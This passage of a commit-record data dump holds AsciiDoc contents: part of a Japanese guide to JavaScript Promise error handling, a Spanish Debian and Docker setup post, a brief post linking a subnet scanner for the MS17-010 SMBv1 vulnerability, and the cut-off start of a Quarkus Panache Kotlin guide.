\u3068\u3044\u3046typo\u304c\u3042\u308b\n\n\u3053\u306e\u5834\u5408\u306f\u3001`console`\u3092`conosle`\u3068typo\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3059\u308b\u306f\u305a\u3067\u3059\u3002\n\n> ReferenceError: conosle is not defined\n\n\u3057\u304b\u3057\u3001Promise\u3067\u306ftry-catch\u3055\u308c\u308b\u305f\u3081\u3001\u30a8\u30e9\u30fc\u304c\u63e1\u308a\u3064\u3076\u3055\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u73fe\u8c61\u304c\u767a\u751f\u3057\u3084\u3059\u304f\u306a\u308a\u307e\u3059\u3002\n\u6bce\u56de\u3001\u6b63\u3057\u304f`catch`\u306e\u51e6\u7406\u3092\u66f8\u304f\u3053\u3068\u304c\u51fa\u6765\u308b\u5834\u5408\u306f\u4f55\u3082\u554f\u984c\u3042\u308a\u307e\u305b\u3093\u304c\u3001\nPromise\u306e\u5b9f\u88c5\u306b\u3088\u3063\u3066\u306f\u3053\u306e\u3088\u3046\u306a\u30df\u30b9\u304c\u691c\u77e5\u3057\u306b\u304f\u304f\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u3053\u3068\u3092\u77e5\u3063\u3066\u304a\u304f\u3079\u304d\u3067\u3057\u3087\u3046\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u306f__unhandled rejection__\u3068\u8a00\u308f\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\nRejected\u3055\u308c\u305f\u6642\u306e\u51e6\u7406\u304c\u306a\u3044\u3068\u3044\u3046\u305d\u306e\u307e\u307e\u306e\u610f\u5473\u3067\u3059\u306d\u3002\n\n[NOTE]\n====\n\u3053\u306eunhandled rejection\u304c\u691c\u77e5\u3057\u306b\u304f\u3044\u554f\u984c\u306fPromise\u306e\u5b9f\u88c5\u306b\u4f9d\u5b58\u3057\u307e\u3059\u3002\n\u4f8b\u3048\u3070\u3001 https:\/\/github.com\/yahoo\/ypromise[ypromise] \u306funhandled rejection\u304c\u3042\u308b\u5834\u5408\u306f\u3001\u305d\u306e\u4e8b\u3092\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u8868\u793a\u3057\u307e\u3059\u3002\n\n> Promise rejected but no error handlers were registered to it\n\n\u307e\u305f\u3001 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u306e\u5834\u5408\u3082\u3001\n\u660e\u3089\u304b\u306b\u4eba\u9593\u306e\u30df\u30b9\u306b\u307f\u3048\u308bReferenceError\u306e\u5834\u5408\u306a\u3069\u306f\u305d\u306e\u307e\u307e\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u30a8\u30e9\u30fc\u3092\u8868\u793a\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n\n> \"Possibly unhandled ReferenceError. conosle is not defined\n\n\u30cd\u30a4\u30c6\u30a3\u30d6\u306ePromise\u306e\u5834\u5408\u3082\u540c\u69d8\u306b\u3053\u306e\u554f\u984c\u3078\u306e\u5bfe\u51e6\u3068\u3057\u3066GC-based unhandled rejection tracking\u3068\u3044\u3046\u3082\u306e\u304c\n\u642d\u8f09\u3055\u308c\u3064\u3064\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u30ac\u30fc\u30d9\u30c3\u30b8\u30b3\u30ec\u30af\u30b7\u30e7\u30f3\u306b\u3088\u3063\u3066\u56de\u53ce\u3055\u308c\u308b\u3068\u304d\u306b\u3001\n\u305d\u308c\u304cunhandled rejection\u3067\u3042\u308b\u306a\u3089\u3001\u30a8\u30e9\u30fc\u8868\u793a\u3092\u3059\u308b\u3068\u3044\u3046\u4ed5\u7d44\u307f\u304c\u30d9\u30fc\u30b9\u3068\u306a\u3063\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\n\nhttps:\/\/twitter.com\/domenic\/status\/461154989856264192[Firefox] \u3084 https:\/\/code.google.com\/p\/v8\/issues\/detail?id=3093[Chrome] \u306e\u30cd\u30a4\u30c6\u30a3\u30d6Promise\u3067\u306f\u4e00\u90e8\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n====\n\n=== done\u306e\u5b9f\u88c5\n\nPromise\u306b\u304a\u3051\u308b `done` \u306f\u5148\u7a0b\u306e\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u3092\u907f\u3051\u308b\u306b\u306f\u3069\u3046\u3059\u308b\u304b\u3068\u3044\u3046\u65b9\u6cd5\u8ad6\u3068\u3057\u3066\u3001\n\u305d\u3082\u305d\u3082\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u3057\u306a\u3051\u308c\u3070\u3044\u3044 \u3068\u3044\u3046\u8c6a\u5feb\u306a\u89e3\u6c7a\u65b9\u6cd5\u3092\u63d0\u4f9b\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u3067\u3059\u3002\n\n`done`\u306fPromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u308b\u306e\u3067\u3001\n`Promise.prototype.done`\u3068\u3044\u3046Promise\u306eprototype\u62e1\u5f35\u3068\u3057\u3066\u5b9f\u88c5\u3057\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[promise-prototype-done.js]]\n.promise-prototype-done.js\n----\ninclude::lib\/promise-prototype-done.js[]\n----\n\nsetTimeout\u306e\u4e2d\u3067throw\u3092\u3059\u308b\u3053\u3068\u3067\u3001\u5916\u3078\u305d\u306e\u307e\u307e\u4f8b\u5916\u3092\u6295\u3052\u308b\u3053\u3068\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\n\n[source,js]\n.setTimeout\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u5185\u306e\u4f8b\u5916\n----\ntry{\n setTimeout(function callback() {\n throw new Error(\"error\");\/\/ <1>\n }, 0);\n}catch(error){\n console.error(error);\n}\n----\n<1> \u3053\u306e\u4f8b\u5916\u306f\u30ad\u30e3\u30c3\u30c1\u3059\u308b\u3053\u3068\u51fa\u6765\u306a\u3044\n\n[NOTE]\n====\n\u306a\u305c\u975e\u540c\u671f\u306e`callback`\u5185\u3067\u306e\u4f8b\u5916\u3092\u30ad\u30e3\u30c3\u30c1\u51fa\u6765\u306a\u3044\u306e\u304b\u306f\u4ee5\u4e0b\u304c\u53c2\u8003\u306a\u308a\u307e\u3059\u3002\n\n- http:\/\/techblog.yahoo.co.jp\/programming\/javascript_error\/[JavaScript\u3068\u975e\u540c\u671f\u306e\u30a8\u30e9\u30fc\u51e6\u7406 - Yahoo! JAPAN Tech Blog]\n====\n\n<<promise-prototype-done.js,`Promise.prototype.done`>> \u3092\u3088\u304f\u898b\u3066\u307f\u308b\u3068\u3001\u4f55\u3082`return`\u3057\u3066\u3044\u306a\u3044\u3053\u3068\u3082\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\u3064\u307e\u308a\u3001`done`\u306f\u300c\u3053\u3053\u3067Promise chain\u306f\u7d42\u4e86\u3057\u3066\u3001\u4f8b\u5916\u304c\u8d77\u304d\u305f\u5834\u5408\u306f\u305d\u306e\u307e\u307epromise\u306e\u5916\u3078\u6295\u3052\u76f4\u3059\u300d\u3068\u3044\u3046\u51e6\u7406\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u5b9f\u88c5\u3084\u74b0\u5883\u304c\u3057\u3063\u304b\u308a\u5bfe\u5fdc\u3057\u3066\u3044\u308c\u3070\u3001__unhandled rejection__\u306e\u691c\u77e5\u306f\u3067\u304d\u308b\u305f\u3081\u3001\u5fc5\u305a\u3057\u3082`done`\u304c\u5fc5\u8981\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u304f\u3001\n\u307e\u305f\u4eca\u56de\u306e<<promise-prototype-done.js,`Promise.prototype.done`>>\u306e\u3088\u3046\u306b\u3001`done`\u306f\u65e2\u5b58\u306ePromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u305f\u3081\u3001\n<<es6-promises,ES6 Promises>>\u306e\u4ed5\u69d8\u305d\u306e\u3082\u306e\u306b\u306f\u5165\u3089\u306a\u304b\u3063\u305f\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n[NOTE]\n\u4eca\u56de\u306e`Promise.prototype.done`\u306e\u5b9f\u88c5\u306f https:\/\/www.promisejs.org\/[promisejs.org] \u3092\u53c2\u8003\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n\n=== \u307e\u3068\u3081\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001 https:\/\/github.com\/kriskowal\/q\/wiki\/API-Reference#promisedoneonfulfilled-onrejected-onprogress[Q] \u3084 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u3084 https:\/\/github.com\/cscott\/prfun#promisedone--undefined[prfun] \u7b49\n\u591a\u304f\u306ePromise\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b`done`\u306e\u57fa\u790e\u7684\u306a\u5b9f\u88c5\u3068\u3001`then`\u3068\u306f\u3069\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3073\u307e\u3057\u305f\u3002\n\n`done`\u306b\u306f2\u3064\u306e\u5074\u9762\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\n\n* `done`\u306e\u4e2d\u3067\u8d77\u304d\u305f\u30a8\u30e9\u30fc\u306f\u5916\u3078\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u76f4\u3059\n* Promise chain \u3092\u7d42\u4e86\u3059\u308b\u3068\u3044\u3046\u5ba3\u8a00\n\n<<then-or-catch,then or catch?>> \u3068\u540c\u69d8\u306bPromise\u306b\u3088\u308a\u6c88\u9ed9\u3057\u3066\u3057\u307e\u3063\u305f\u30a8\u30e9\u30fc\u306b\u3064\u3044\u3066\u306f\u3001\n\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u3084\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u6539\u5584\u7b49\u3067\u6b86\u3069\u306e\u30b1\u30fc\u30b9\u3067\u306f\u554f\u984c\u3067\u306f\u306a\u304f\u306a\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u307e\u305f\u3001`done`\u306f\u5024\u3092\u8fd4\u3055\u306a\u3044\u4e8b\u3067\u305d\u308c\u4ee5\u4e0aPromise chain\u3092\u7e4b\u3052\u308b\u4e8b\u304c\u3067\u304d\u306a\u304f\u306a\u308b\u305f\u3081\u3001\n\u305d\u306e\u3088\u3046\u306a\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u7528\u9014\u3067`done`\u3092\u4f7f\u3046\u3053\u3068\u3082\u51fa\u6765\u307e\u3059\u3002\n\n<<es6-promises,ES6 Promises>> \u3067\u306f\u6839\u672c\u306b\u7528\u610f\u3055\u308c\u3066\u308b\u6a5f\u80fd\u306f\u3042\u307e\u308a\u591a\u304f\u3042\u308a\u307e\u305b\u3093\u3002\n\u305d\u306e\u305f\u3081\u3001\u81ea\u3089\u62e1\u5f35\u3057\u305f\u308a\u3001\u62e1\u5f35\u3057\u305f\u30e9\u30a4\u30d6\u30e9\u30ea\u7b49\u3092\u5229\u7528\u3059\u308b\u30b1\u30fc\u30b9\u304c\u591a\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u305d\u306e\u6642\u3067\u3082\u4f55\u3067\u3082\u3084\u308a\u904e\u304e\u308b\u3068\u3001\u305b\u3063\u304b\u304f\u975e\u540c\u671f\u51e6\u7406\u3092Promise\u3067\u307e\u3068\u3081\u3066\u3082\u8907\u96d1\u5316\u3057\u3066\u3057\u307e\u3046\u5834\u5408\u304c\u3042\u308b\u305f\u3081\u3001\n\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u306e\u306f\u62bd\u8c61\u7684\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3067\u3042\u308bPromise\u306b\u304a\u3044\u3066\u306f\u5927\u4e8b\u306a\u90e8\u5206\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c8d57eb5701a7a561f50ed6ea083617e678cfd2b","subject":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","message":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","new_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","new_contents":"= Despliegue de entorno base de trabajo (Debian 8)\nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-11-01\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal,Work,Php, Python, JS\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n\n\n\n### Paquetes basicos \n\nlocate rsync bash-completion wget tcpdump ntpdate finger links lynx ccze ethtool rcconf deborphan less screen tree curl wget telnet iputils-ping dnsutils lsof patch irqbalance acpi-support lvm2 powermgmt-base openssh-server sudo ssh-askpass ssl-cert ca-certificates libnet-dns-perl iproute psad libpam-cracklib locales util-linux-locales bridge-utils iftop sysstat snmp smartmontools lm-sensors htop iftop powertop apmd vim vim-scripts bash-completion perl-modules python-minimal python-pip python-setuptools ruby php5-cli git-core xfsprogs btrfs-tools dosfstools ntfs-3g cifs-utils firmware-linux firmware-linux-free firmware-linux-nonfree initramfs-tools lsb-release localepurge hdparm inkscape dia gdebi geany apt-transport-https openjdk-7-jre openjdk-7-jre-headless virtualbox vagrant vlc exaile libavcodec-extra guake pgadmin3\n\n### Instalar Skype\nhttps:\/\/wiki.debian.org\/skype#Debian_8_.22Jessie.22\n\n### Instalar Docker \nhttps:\/\/docs.docker.com\/installation\/debian\/#debian-jessie-80-64-bit\n\nAgregar Imagenes Docker:\n\ndocker pull odoo -> https:\/\/hub.docker.com\/_\/odoo\/\n\ndocker pull postgres -> https:\/\/hub.docker.com\/_\/postgres\/\n\ndocker pull mysql -> https:\/\/hub.docker.com\/_\/mysql\/\n\ndocker pull schmunk42\/yii2-app-basic\t\n\ndocker pull wordpress https:\/\/hub.docker.com\/_\/wordpress\/\n\ndocker pull k3v0r\/janus-gateway\n\ndocker pull node -> https:\/\/hub.docker.com\/_\/node\/\n\ndocker pull httpd -> https:\/\/hub.docker.com\/_\/httpd\/ \n\ndocker pull nginx -> https:\/\/hub.docker.com\/_\/nginx\/\n\ndocker pull debian -> https:\/\/hub.docker.com\/_\/debian\/\n\ndocker pull ubuntu -> https:\/\/hub.docker.com\/_\/ubuntu\/\n\ndocker pull fedora -> https:\/\/hub.docker.com\/_\/fedora\/\n\ndocker pull django -> https:\/\/hub.docker.com\/_\/django\/\n\ndocker pull mongo -> https:\/\/hub.docker.com\/_\/mongo\/\n\ndocker pull mariadb -> https:\/\/hub.docker.com\/_\/mariadb\/\n\ndocker pull redis -> https:\/\/hub.docker.com\/_\/redis\/\n\ndocker pull cassandra -> https:\/\/hub.docker.com\/_\/cassandra\/\n\ndocker pull couchbase -> https:\/\/hub.docker.com\/_\/couchbase\/\n\ndocker pull drupal -> https:\/\/hub.docker.com\/_\/drupal\/\n\ndocker pull elasticsearch -> https:\/\/hub.docker.com\/_\/elasticsearch\/\n\ndocker pull php -> https:\/\/hub.docker.com\/_\/php\/\n\ndocker pull owncloud -> https:\/\/hub.docker.com\/_\/owncloud\/ \n\ndocker pull jenkins -> https:\/\/hub.docker.com\/_\/jenkins\/\n\n\ndocker pull gitlab\/gitlab-ce -> https:\/\/hub.docker.com\/r\/gitlab\/gitlab-ce\/ \n\ndocker pull sebp\/elk -> https:\/\/hub.docker.com\/r\/sebp\/elk\/\n\ndocker pull htdvisser\/taiga-back -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-back\/\n\ndocker pull htdvisser\/taiga-front-dist -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-front-dist\/\n\ndocker pull zabbix\/zabbix-server-2.4 -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-server-2.4\/ \n\ndocker pull zabbix\/zabbix-db-mariadb -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-db-mariadb\/\n\ndocker pull coudot\/lemonldap-ng -> https:\/\/hub.docker.com\/r\/coudot\/lemonldap-ng\/ \n\ndocker pull p0bailey\/docker-flask -> https:\/\/hub.docker.com\/r\/p0bailey\/docker-flask\/\n\ndocker pull dinkel\/openldap -> https:\/\/hub.docker.com\/r\/dinkel\/openldap\/ \t\n\ndocker pull debian\/debhelper -> todo lo necesario para empaquetar \n\n\n\t# Correr Odoo dentro de Docker \n\tdocker run -d -e POSTGRES_USER=odoo -e POSTGRES_PASSWORD=odoo --name db postgres\n\tdocker run -p 127.0.0.1:8069:8069 --name odoo --link db:db -t odoo\n\n\t# Proyectos en Yii2 \n\tdocker run -p 8888:80 schmunk42\/yii2-app-basic\n\t\n\t# Proyectos en Wordpress \n\tdocker run --name some-wordpress --link some-mysql:mysql -d wordpress\n\n\/\/# agregar todas las imagenes de un solo comando:\n\n\/\/ docker pull odoo && docker pull postgres && docker pull mysql && docker pull schmunk42\/yii2-app-basic\t&& docker pull wordpress && docker pull k3v0r\/janus-gateway && docker pull node && docker pull httpd && docker pull nginx && docker pull debian && docker pull ubuntu && docker pull fedora && docker pull django && docker pull mongo && docker pull mariadb && docker pull redis && docker pull cassandra && docker pull couchbase && docker pull drupal && docker pull elasticsearch && docker pull php && docker pull owncloud && docker pull jenkins && docker pull gitlab\/gitlab-ce && docker pull sebp\/elk && docker pull htdvisser\/taiga-back && docker pull htdvisser\/taiga-front-dist && docker pull zabbix\/zabbix-server-2.4 && docker pull zabbix\/zabbix-db-mariadb && docker pull coudot\/lemonldap-ng && docker pull p0bailey\/docker-flask && docker pull dinkel\/openldap \n\n# Otras Opciones de entornos:\n\n # Instalar Composer \n https:\/\/styde.net\/instalar-y-actualizar-paquetes-con-composer\/\n http:\/\/librosweb.es\/libro\/composer\/capitulo_1\/instalacion_en_servidores_linux.html\n\n\n # Instalar homestead \n https:\/\/styde.net\/crea-entornos-de-desarrollo-para-laravel-con-homestead\/\n https:\/\/styde.net\/como-instalar-y-configurar-laravel-homestead-2-0\/\n vagrant box add laravel\/homestead\n composer global require \"laravel\/homestead=~2.0\"\n export PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"\n echo 'export PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"' >> \/home\/user\/.bashrc\n\n # Instalar node \n https:\/\/github.com\/nodejs\/node-v0.x-archive\/wiki\/Installing-Node.js-via-package-manager?\tutm_source=[deliciuos]&utm_medium=twitter#debian-and-ubuntu-based-linux-distributions\n\n\t# Setting up Django with Nginx, Gunicorn, virtualenv, supervisor and PostgreSQL\n http:\/\/michal.karzynski.pl\/blog\/2013\/06\/09\/django-nginx-gunicorn-virtualenv-supervisor\/\n\n\t\n\n\nTIP: happy hacking!!!\n","old_contents":"= Despliegue de entorno base de trabajo\nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-11-01\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal,Work,Php, Python, JS\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n\n\n\n### Paquetes basicos \n\nlocate rsync bash-completion wget tcpdump ntpdate finger links lynx ccze ethtool rcconf deborphan less screen tree curl wget telnet iputils-ping dnsutils lsof patch irqbalance acpi-support lvm2 powermgmt-base openssh-server sudo ssh-askpass ssl-cert ca-certificates libnet-dns-perl iproute psad libpam-cracklib locales util-linux-locales bridge-utils iftop sysstat snmp smartmontools lm-sensors htop iftop powertop apmd vim vim-scripts bash-completion perl-modules python-minimal python-pip python-setuptools ruby php5-cli git-core xfsprogs btrfs-tools dosfstools ntfs-3g cifs-utils firmware-linux firmware-linux-free firmware-linux-nonfree initramfs-tools lsb-release localepurge hdparm inkscape dia gdebi geany apt-transport-https openjdk-7-jre openjdk-7-jre-headless virtualbox vagrant vlc exaile libavcodec-extra guake pgadmin3\n\n### Instalar Skype\nhttps:\/\/wiki.debian.org\/skype#Debian_8_.22Jessie.22\n\n### Instalar Docker \nhttps:\/\/docs.docker.com\/installation\/debian\/#debian-jessie-80-64-bit\n\nAgregar Imagenes Docker:\n\ndocker pull odoo -> https:\/\/hub.docker.com\/_\/odoo\/\ndocker pull postgres -> https:\/\/hub.docker.com\/_\/postgres\/\ndocker pull mysql -> https:\/\/hub.docker.com\/_\/mysql\/\ndocker pull schmunk42\/yii2-app-basic\t\ndocker pull wordpress https:\/\/hub.docker.com\/_\/wordpress\/\ndocker pull k3v0r\/janus-gateway\ndocker pull node -> https:\/\/hub.docker.com\/_\/node\/\ndocker pull httpd -> https:\/\/hub.docker.com\/_\/httpd\/ \ndocker pull nginx -> https:\/\/hub.docker.com\/_\/nginx\/\ndocker pull debian -> https:\/\/hub.docker.com\/_\/debian\/\ndocker pull ubuntu -> https:\/\/hub.docker.com\/_\/ubuntu\/\ndocker pull fedora -> https:\/\/hub.docker.com\/_\/fedora\/\ndocker pull django -> https:\/\/hub.docker.com\/_\/django\/\ndocker pull mongo -> https:\/\/hub.docker.com\/_\/mongo\/\ndocker pull mariadb -> https:\/\/hub.docker.com\/_\/mariadb\/\ndocker pull redis -> https:\/\/hub.docker.com\/_\/redis\/\ndocker pull cassandra -> https:\/\/hub.docker.com\/_\/cassandra\/\ndocker pull couchbase -> https:\/\/hub.docker.com\/_\/couchbase\/\ndocker pull drupal -> https:\/\/hub.docker.com\/_\/drupal\/\ndocker pull elasticsearch -> https:\/\/hub.docker.com\/_\/elasticsearch\/\ndocker pull php -> https:\/\/hub.docker.com\/_\/php\/\ndocker pull owncloud -> https:\/\/hub.docker.com\/_\/owncloud\/ \ndocker pull jenkins -> https:\/\/hub.docker.com\/_\/jenkins\/\ndocker pull gitlab\/gitlab-ce -> https:\/\/hub.docker.com\/r\/gitlab\/gitlab-ce\/ \ndocker pull sebp\/elk -> https:\/\/hub.docker.com\/r\/sebp\/elk\/\ndocker pull htdvisser\/taiga-back -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-back\/\ndocker pull htdvisser\/taiga-front-dist -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-front-dist\/\ndocker pull zabbix\/zabbix-server-2.4 -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-server-2.4\/ \ndocker pull zabbix\/zabbix-db-mariadb -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-db-mariadb\/\ndocker pull coudot\/lemonldap-ng -> https:\/\/hub.docker.com\/r\/coudot\/lemonldap-ng\/ \ndocker pull p0bailey\/docker-flask -> https:\/\/hub.docker.com\/r\/p0bailey\/docker-flask\/\ndocker pull dinkel\/openldap -> https:\/\/hub.docker.com\/r\/dinkel\/openldap\/ \t\n\n# agregar todas las imagenes de un solo comando:\n\n\/\/ docker pull odoo && docker pull postgres && docker pull mysql && docker pull schmunk42\/yii2-app-basic\t&& docker pull wordpress && docker pull k3v0r\/janus-gateway && docker pull node && docker pull httpd && docker pull nginx && docker pull debian && docker pull ubuntu && docker pull fedora && docker pull django && docker pull mongo && docker pull mariadb && docker pull redis && docker pull cassandra && docker pull couchbase && docker pull drupal && docker pull elasticsearch && docker pull php && docker pull owncloud && docker pull jenkins && docker pull gitlab\/gitlab-ce && docker pull sebp\/elk && docker pull htdvisser\/taiga-back && docker pull htdvisser\/taiga-front-dist && docker pull zabbix\/zabbix-server-2.4 && docker pull zabbix\/zabbix-db-mariadb && docker pull coudot\/lemonldap-ng && docker pull p0bailey\/docker-flask && docker pull dinkel\/openldap \n\n\n\n\n#Pendientes \ndocker pull debian\/debhelper -> todo lo necesario para empaquetar \n\n\n\t# Correr Odoo dentro de Docker \n\tdocker run -d -e POSTGRES_USER=odoo -e POSTGRES_PASSWORD=odoo --name db postgres\n\tdocker run -p 127.0.0.1:8069:8069 --name odoo --link db:db -t odoo\n\n\t# Proyectos en Yii2 \n\tdocker run -p 8888:80 schmunk42\/yii2-app-basic\n\t\n\t# Proyectos en Wordpress \n\tdocker run --name some-wordpress --link some-mysql:mysql -d wordpress\n\n\t# Proyecto con Janus \n\n### Instalar Composer \nhttps:\/\/styde.net\/instalar-y-actualizar-paquetes-con-composer\/\nhttp:\/\/librosweb.es\/libro\/composer\/capitulo_1\/instalacion_en_servidores_linux.html\n\n\n### Agregar homestead \nhttps:\/\/styde.net\/crea-entornos-de-desarrollo-para-laravel-con-homestead\/\nhttps:\/\/styde.net\/como-instalar-y-configurar-laravel-homestead-2-0\/\n\n\nvagrant box add laravel\/homestead\ncomposer global require \"laravel\/homestead=~2.0\"\nexport PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"\necho 'export PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"' >> \/home\/user\/.bashrc\n\n### Instalar node \nhttps:\/\/github.com\/nodejs\/node-v0.x-archive\/wiki\/Installing-Node.js-via-package-manager?utm_source=[deliciuos]&utm_medium=twitter#debian-and-ubuntu-based-linux-distributions\n\n\n\n\n\nTIP: happy hacking!!!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d92a3ed3287c6ea68dd123f4bc173cd4d8bf0932","subject":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","message":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomeware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the DoublePulsar \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WanaCrypt ransomware].)\n\nThe tool is great, however it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","old_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomeware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the Eternalblue \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WanaCrypt ransomware].)\n\nThe tool is great, however it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c03a6245c1436f2bb887a21bf3f7061b755e7cbc","subject":"Fix a link in the Panache Kotlin guide","message":"Fix a link in the Panache Kotlin guide\n\n+ fix a couple of case issues in passing\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-kotlin.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-kotlin.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache and Kotlin\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto standard JPA implementation and is well-known in the Java ecosystem. Panache offers a\nnew layer atop this 